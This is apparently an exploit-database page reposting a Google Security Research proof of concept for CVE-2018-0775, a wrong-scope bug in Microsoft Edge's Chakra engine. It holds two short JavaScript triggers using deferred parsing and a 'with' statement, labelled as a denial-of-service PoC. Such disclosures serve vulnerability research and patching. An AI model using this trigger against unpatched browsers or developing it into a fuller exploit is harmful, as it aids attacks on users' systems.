[ authorization ] [ registration ] [ Wiederherstellen ]
Kontaktiere uns
You can contact us by:
0day.today Exploits Market and 0day Exploits Database

Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)

Autor
Google Security Research
Risiko
[
Security Risk Medium
]
0day-ID
0day-ID-29570
Kategorie
dos / poc
Datum hinzufügen
17-01-2018
CVE
CVE-2018-0775
Betriebssystem
windows
/*
Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to  issue 1310 .
 
PoC:
*/
 
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));
 
PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());

#  0day.today [2024-07-04]  #